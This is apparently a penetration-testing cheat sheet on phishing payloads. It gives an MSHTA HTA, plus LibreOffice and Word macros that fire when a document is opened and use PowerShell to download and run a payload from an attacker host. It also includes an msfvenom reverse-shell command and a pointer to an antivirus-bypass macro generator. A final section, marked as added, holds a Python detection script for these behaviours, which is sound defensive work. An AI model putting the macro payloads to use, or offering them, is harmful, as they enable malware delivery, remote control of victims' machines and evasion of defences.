Phishing Payload

Prepare for phishing payload

MSHTA

# simple ping


<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("ping -n 3 10.10.x.y");
</script>
</head>

<body>
<script language="JScript">
self.close();
</script>
</body>
</html>

LibreOffice (Linux)

If your target has a script that opens the document, a LibreOffice macro is a simple approach.

  1. Write Documents

  2. Create Macros

Tools > Macros > Organize Macro > Basic

[Basic Macros]

Untitled 1 > New > (give a name)

Macro payload:

Sub Main
    Shell("cmd /c powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1")
    Shell("cmd /c powershell C:/Windows/Tasks/shell.ps1")
End Sub

  3. Tools > Customize > Events [Open Document]

Macro... > (choose last macro)

  4. Save Document.

Microsoft Word

Make sure you save the document as doc or docm. Try both formats for your payload.

  1. Write Documents

  2. Create Macros

Make sure the macro is stored in the current document.
View > Macros

[Basic Macros]

"MyMacro" > Create

Macro payload

check the encoded payload below:

Bypass All The Things

  3. Save Document.

Macro

BadAssMacro

Bypass antivirus with this auto-generated macro:

https://github.com/Inf0secRabbit/BadAssMacros

Generate shellcode with format raw

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw > shellcode.raw

Generate VBA

.\BadAssMacrosx64.exe -i shellcode.raw -s indirect -p no -w doc -o out.txt

Copy and paste the contents of out.txt into the VBA script.

Standard Format

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://<ATTACKER IP>/testing.exe', 'C:\Windows\Tasks\testing.exe')"
    Dim exePath As String
    exePath = "C:\Windows\Tasks\" + "testing.exe"
    Shell str, vbHide
    Wait (3)
    Shell exePath, vbHide
End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub
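
Detection view of the payloads above, as an added example that is not part of the original page: a small triage over process-creation events that flags a document host (mshta, Word, LibreOffice) starting a shell, a download primitive on the command line, and anything touching C:\Windows\Tasks. The event field names, rule names and sample events are assumptions constructed for illustration; 192.0.2.10 is a placeholder address.

```python
import re

# Parents the page's payloads run under: the HTA host, Word, LibreOffice.
DOC_HOSTS = {"mshta.exe", "winword.exe", "soffice.exe", "soffice.bin"}
# Children a document host rarely needs; ping.exe covers the page's HTA test.
CHILD_TOOLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "ping.exe"}
DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|downloadfile)\b", re.I)
# Matches both C:\Windows\Tasks\ and C:/Windows/Tasks/ as the macros write it.
TASKS_DIR = re.compile(r"c:[\\/]+windows[\\/]+tasks[\\/]", re.I)

def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

def classify(event):
    """Return the sorted rule names matched by one process-creation event."""
    hits = set()
    if basename(event["parent"]) in DOC_HOSTS and basename(event["image"]) in CHILD_TOOLS:
        hits.add("doc_host_spawned_tool")
    if DOWNLOAD.search(event["cmdline"]):
        hits.add("download_primitive")
    if TASKS_DIR.search(event["cmdline"]) or TASKS_DIR.search(event["image"]):
        hits.add("windows_tasks_staging")
    return sorted(hits)

def triage(events):
    """Keep only events that matched at least one rule."""
    return [(e["image"], classify(e)) for e in events if classify(e)]

# Constructed sample events (hypothetical field names; 192.0.2.10 is a placeholder).
EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell (New-Object System.Net.WebClient).DownloadFile("
                r"'http://192.0.2.10/testing.exe', 'C:\Windows\Tasks\testing.exe')"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\Tasks\testing.exe",
     "cmdline": r"C:\Windows\Tasks\testing.exe"},
    {"parent": r"C:\Program Files\LibreOffice\program\soffice.bin",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell iwr http://192.0.2.10/shell.ps1 -o C:/Windows/Tasks/shell.ps1"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\PING.EXE",
     "cmdline": "ping -n 3 192.0.2.10"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem"},
]

if __name__ == "__main__":
    for image, rules in triage(EVENTS):
        print(image, rules)
```

The second event shows why the staging-directory rule is kept separate: the dropped executable is started by Word directly, so the parent/child rule alone would miss it.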
